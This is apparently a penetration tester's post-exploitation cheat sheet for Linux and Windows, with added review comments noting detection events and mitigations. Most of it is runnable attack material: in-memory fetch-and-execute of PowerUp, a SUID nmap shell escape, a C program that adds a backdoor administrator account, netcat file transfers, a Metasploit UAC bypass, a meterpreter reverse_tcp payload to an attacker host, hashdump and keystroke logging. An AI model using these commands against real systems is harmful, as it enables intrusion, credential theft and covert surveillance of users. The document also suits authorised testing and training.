Post Exploitation

Linux Privilege Escalation

# Kernel Exploits
# NOTE(review): --no-check-certificate turns off TLS certificate validation, so the
# script fetched here could be swapped in transit. Fetch it over a verified channel and
# read it before running it on any host; it is executed as-is on the next line.
wget --no-check-certificate https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
# Runs the downloaded Perl script — presumably it compares the running kernel version
# against a list of public exploits (enumeration only; nothing is exploited here). Verify.
./linux-exploit-suggester-2.pl

# Common Linux Exploits
# All three are long-fixed upstream; a kernel kept at a supported version makes this list moot.
# Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition
https://www.exploit-db.com/exploits/40839

# Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice'
https://www.exploit-db.com/exploits/5093

# Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1
https://www.exploit-db.com/exploits/8572
# Misconfigurations
# NOTE(review): same unverified download as above — --no-check-certificate again.
wget --no-check-certificate https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Enumeration script run via bash (no exec bit needed); review it first for the same reason.
bash LinEnum.sh

# SUID Bit
# Lists every file with the setuid bit (-perm -4000) on the whole filesystem; permission
# errors from unreadable directories are discarded. A defender can run the same command
# to audit which setuid binaries actually need the bit.
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
# If nmap is setuid root, its interactive prompt's "!" escape spawns a shell that inherits
# that privilege. Mitigation: remove the setuid bit from nmap (it does not need it).
nmap –interactive
!sh

Windows Privilege Escalation

# Misconfigurations
# Starts PowerShell with the execution policy bypassed for this process only. The policy is
# not a security boundary, but an explicit bypass is itself a common detection signal.
Powershell -ExecutionPolicy bypass
# NOTE(review): downloads PowerUp.ps1 over HTTPS and runs it in memory with no integrity
# check; pin/review the script before use. When Script Block Logging is enabled, the
# executed content is recorded in the PowerShell operational log (Event ID 4104).
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")
# Runs every PowerUp check; -HTMLReport presumably writes the findings to an HTML file — verify.
Invoke-AllChecks -HTMLReport

# Kernel Exploits
# Saves the target's OS build and installed-hotfix inventory; the suggester parses this file.
systeminfo > systeminfo.txt
# The remaining steps look like they are run off-host (e.g. on Kali) against the copied
# systeminfo.txt — wget/python are not assumed on the Windows target. Verify.
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
# --update presumably fetches the current Microsoft security bulletin spreadsheet; the
# 2014-06-06 filename below is an example and should match whatever --update actually
# produced, otherwise -d points at a file that does not exist.
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -d 2014-06-06-mssb.xlsx -i systeminfo.txt

Verify

# ICACLS
# Prints the ACL of the executable. The verification is whether a non-administrative
# principal (e.g. Users, Authenticated Users, Everyone) holds W, M or F on it — write
# access lets the binary be replaced. Mitigation: restrict write rights on the file and
# its directory to Administrators/SYSTEM.
icacls.exe  "C:\Program Files (x86)\Photodex\ProShow Producer\ScsiAccess.exe"

Exploit

# include <stdlib.h>
/*
 * Proof-of-concept program for the preceding ICACLS finding: it is presumably dropped
 * in place of the writable executable so that whatever runs that file executes these
 * two commands (verify against the Verify step above). Each system() call runs the
 * command through the command interpreter; their exit statuses are not checked.
 *
 * Defender notes: the account creation and group change raise Security log events
 * 4720 (user account created) and 4732 (member added to a security-enabled local
 * group); with process-creation auditing enabled, the net.exe launches appear as
 * well. The fix is the ACL restriction noted in the Verify step.
 */
int main () {
    system ("net user test 123456789 /add");             /* creates local user "test" */
    system ("net localgroup administrators test /add");  /* adds it to Administrators */
    return 0;
}

Compile

# Installs the MinGW-w64 cross toolchain targeting 32-bit (i686) Windows on the Debian/Kali host.
apt-get install gcc-mingw-w64-i686
# Cross-compiles main.c into a 32-bit Windows executable; no Windows build box needed.
i686-w64-mingw32-gcc main.c -o main.exe

File Transfer

Wget

# Kali
# Serves the current directory over plain HTTP on port 8000. SimpleHTTPServer is the
# Python 2 module name; under Python 3 the equivalent is `python3 -m http.server`.
python -m SimpleHTTPServer
# Target
# NOTE(review): the host has only three octets (192.168.114); the same setup elsewhere on
# this page uses 192.168.1.114. Plain HTTP — the transfer is visible on the wire.
wget 192.168.114:8000/file.txt

Netcat

# Target
# Listens on TCP 4444 and writes everything received into a file named "wget"
# (the binary pushed from Kali below). Raw TCP: nothing verifies the file's integrity.
nc -nlvp 4444 > wget
# Kali
# Streams the local wget binary to the target's listener.
nc -nv 192.168.1.4 4444 < /usr/bin/wget

Powershell

# Kali
# Serves the current directory over plain HTTP on port 8000 (Python 2 module name; Python 3
# uses `python3 -m http.server`).
python -m SimpleHTTPServer
# Target
# Downloads file.txt over plain HTTP to a fixed local path. When PowerShell logging is
# enabled, a -command string like this is typically recorded (Event ID 4104), and the
# WebClient download shows up as outbound HTTP from powershell.exe.
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.114:8000/file.txt', 'C:\users\test\file.txt')"

Interactive Shell

# Python shell
# Spawns bash inside a pseudo-terminal so the shell gets a tty (job control, prompts,
# programs that refuse to run without a terminal).
python -c 'import pty; pty.spawn("/bin/bash")'

# Background the session
# Keystroke, not a command: suspends the current foreground job in the local shell.
(CTRL+ Z)

# Add keyboard shortcuts
# Puts the *local* terminal into raw mode with echo off, so control characters such as
# Ctrl-C are passed through to the remote shell instead of being handled locally.
stty raw -echo

# Foreground the session
fg

# Add clear the screen ability
# Declares a terminal type so full-screen programs (clear, editors) know which escape
# sequences to emit.
export TERM=xterm

Metasploit Post Exploitation

# Searching for exploits
search type:post platform:linux
search type:post platform:windows

# Examples
use post/multi/gather/ping_sweep
show options
set session 1
set rhosts 192.168.1.1-192.168.1.110
run

use post/multi/recon/local_exploit_suggester
set session 1
run

use exploit/windows/local/bypassuac_eventvwr
set session 1
run

# For Windows
use post/windows/manage/payload_inject
set handler true
set lhost 192.168.1.114
set lport 4444
set payload windows/meterpreter/reverse_tcp
set session 1
run

# For Linux
use multi/manage/shell_to_meterpreter

Meterpreter

# Official Reference
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

# Migrate to another process
getpid
migrate 1544

# Download and Upload Files
# remember: meterpreter paths use forward slashes ("/"), as on Linux
download c:/users/test/dir1/test.txt /root/test.txt
upload /root/test.txt c:/users/test/Desktop/test.txt

# Search For Files
search -h
search -f test.txt
search -f *.txt
search -d c:/users/test -f *.txt

# Network Commands
arp | ifconfig | netstat | route
portfwd add -L 192.168.1.107 -l 6666 -r 192.168.1.109 -p 7777 #Forward
portfwd add -R -L 192.168.1.107 -l 4444 -r 192.168.1.109 -p 5555 #Reverse

# Powerful Commands
getsystem
hashdump
screenshot -p /root/screen1.jpeg

# Record Keystroke
migrate {Explorer_PID}
keyscan_start -v
keyscan_dump
keyscan_stop
